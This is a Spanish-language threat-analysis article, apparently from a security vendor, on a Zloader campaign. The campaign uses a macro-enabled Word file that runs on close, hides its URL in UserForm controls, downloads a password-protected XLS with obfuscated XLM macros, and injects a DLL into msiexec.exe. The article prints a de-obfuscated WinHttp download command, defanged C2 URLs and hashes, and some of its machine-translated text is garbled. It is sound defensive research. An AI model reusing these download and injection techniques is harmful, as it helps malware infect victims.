Zloader: vincular diferentes archivos de Office


Zloader, también conocido como Terdot: una variante del infame malware bancario Zeus es bien conocido por usar agresivamente documentos ".xls", ".xlsx" como vector inicial para entregar su carga útil. A pesar de esto, recientemente nos hemos encontrado con el archivo “.docm” que está siendo utilizado por la familia Zoader para realizar su actividad inicial. Esto muestra que a los adversarios les gusta experimentar con documentos de oficina para evitar ser detectados por las soluciones de seguridad.

Fig.1-Cadena de ataque

Vector inicial:

Aquí la cadena de infección comienza con el archivo ".docm". Docm significa "documento de Word de Office habilitado para macros". Podemos ver a continuación, la vista del documento que solicita al usuario que habilite el contenido.

Fig.2- Vista de documento

Como muchos otros documentos, intentamos observar su actividad después de habilitar el contenido, pero no hubo actividad en él. Al mirar su código VBA, obtuvimos nuestra respuesta. La habilitación de contenido no ejecutará la macro. Aquí la ejecución de la macro comienza con el "Cierre del documento", como se muestra.

Fig.3- Llamada a la función de macro

Tan pronto como la víctima cierre este documento, la función "nnn " se llama, que es la función principal de esta macro de VBA. En esto, nuevamente se están llamando subfunciones. Aquí, los adversarios también hacen uso de "Userform" para realizar la actividad de la siguiente etapa.

Fig.4- Llamada a subfunción

La función UserForm_Initialize () se utiliza para invocar "Userform2". La imagen de abajo muestra el objeto userform2. En su cuadro de diálogo, los datos de la URL se fragmentan y superponen en el cuadro combinado número 25 para ocultar los datos reales, como se muestra a continuación.

Fig.5- Datos de URL ocultos

Después de revisar todos los ComboBox de userform2, pudimos localizar la URL maliciosa que se usa para descargar la carga útil de la segunda etapa.

Fig.6- Datos de URL fragmentados

Para resumir la actividad anterior, los adversarios están utilizando for loop para acceder a todos estos valores y crear la URL final como se muestra a continuación,

Fig.7- Creación de URL al cerrar documento

Sitio "hxxps (:) // sentirse en forma-siempre (.) com / 1 (.) php”, Que es malicioso y tiene una puntuación de 11 en total de virus, se utiliza para descargar archivos XLS protegidos con contraseña. Su contraseña está oculta nuevamente en la macro VBA en "Userform1". Al explorar los datos de userform1, pudimos extraer la contraseña oculta.

Fig.8- Código macro para proteger XLS con contraseña

Fig.9- Contraseña oculta XLS

2Dakota del Norte Carga útil de la etapa:

Proteger el documento con contraseña es una técnica clásica para defenderse de los proveedores de AV. Se necesita una contraseña correcta para profundizar en el análisis. Después de hacer coincidir la contraseña anterior, finalmente podemos ver el contenido del libro de Excel. La macro XLM se utiliza en "Sheet3" para realizar más actividades.

Fig.10- Libro de trabajo XLS

Aquí el código está incrustado en diferentes celdas del documento. La siguiente figura muestra el código de macro extraído del libro de trabajo anterior:

Fig.11- Código de macro XLM

Aquí, los adversarios hacen uso de funciones integradas de Excel como IIF y Switch para ofuscar los datos. El código final de-ofuscado se puede ver a continuación,

WinHttp.WinHttpRequest.5.1.open GET https (:) // santarosafuneralhome (.) Com / 2.php False

WinHttp.WinHttpRequest.5.1.SetRequestHeader

WinHttp.WinHttpRequest.5.1.send

La URL maliciosa anterior con una puntuación total de virus de 8 se utiliza para descargar la carga útil de la tercera etapa de este ataque.

Análisis de carga útil final:

La DLL es la carga útil final de Zloader. Aquí, la DLL está muy ofuscada y evita las llamadas directas a las API de Windows. El hash se utiliza para calcular las direcciones y realiza la llamada con los valores calculados, lo que dificulta la reversión.

Fig.12 – Código para el cálculo de la dirección

La DLL crea el proceso "Msiexec.exe", Que es un genuino Proceso de Microsoft que pertenece al instalador de componentes de Windows, en modo suspendido y le inyecta un archivo cifrado.

Fig.13- "msiexec.exe" creado en modo suspendido

Fig.14- Archivo encriptado inyectado en 'msiexec.exe'

También inyecta una rutina que descifrará y sacará el PE malicioso para su ejecución.

Fig.15- Rutina de descifrado

Con la configuración del contexto del hilo, se pasa el punto de ejecución inicial y finalmente el código inyectado se ejecuta con reanudar el hilo.

Cuando este hilo de msiexec.exe entra en ejecución, intenta conectarse a sus servidores CnC como se muestra,

Dado que estas URL estaban inactivas en el momento del análisis, no pudimos profundizar más en ellas.

Conclusión:

Este tipo de ataque muestra cómo los adversarios innovan su mecanismo para iniciar la cadena de infección y comprometer a la víctima. El usuario siempre debe tener cuidado al abrir cualquier archivo de Office. Las soluciones de seguridad empresarial Quick Heal y Seqrite protegen a sus clientes de dichos archivos. Por lo tanto, recuerde mantener las soluciones de seguridad de endpoints siempre actualizadas.

COI:

DOCM: 117fafb46f27238351f2111e8f01416412044238d2f8378a285063eb9d4eef3d

409ed829f19024045d26cc5d3a06e15a097605e13ba938875eca054a7a4a30b1

91aa050536d834947709776af40c2fde49471d28231de50df0d324cd55101df4

XLS: 52d071922413a3be8815a76118a45bf13d8d323b73ba42377591fd68c59dfc89

URL:

https (: //) tiodeitidampheater.tk/post.php

https (: //) actes-etatcivil.com/post.php

https (: //) ankarakreatif.com/post.php

https (: //) www.ramazanyildiz.net/post.php

https (: //) hispaniaeng.com/post.php

https (: //) www.ifdd.francophonie.org/post.php

Experto en la materia:

Anjali Raut

Priyanka Shinde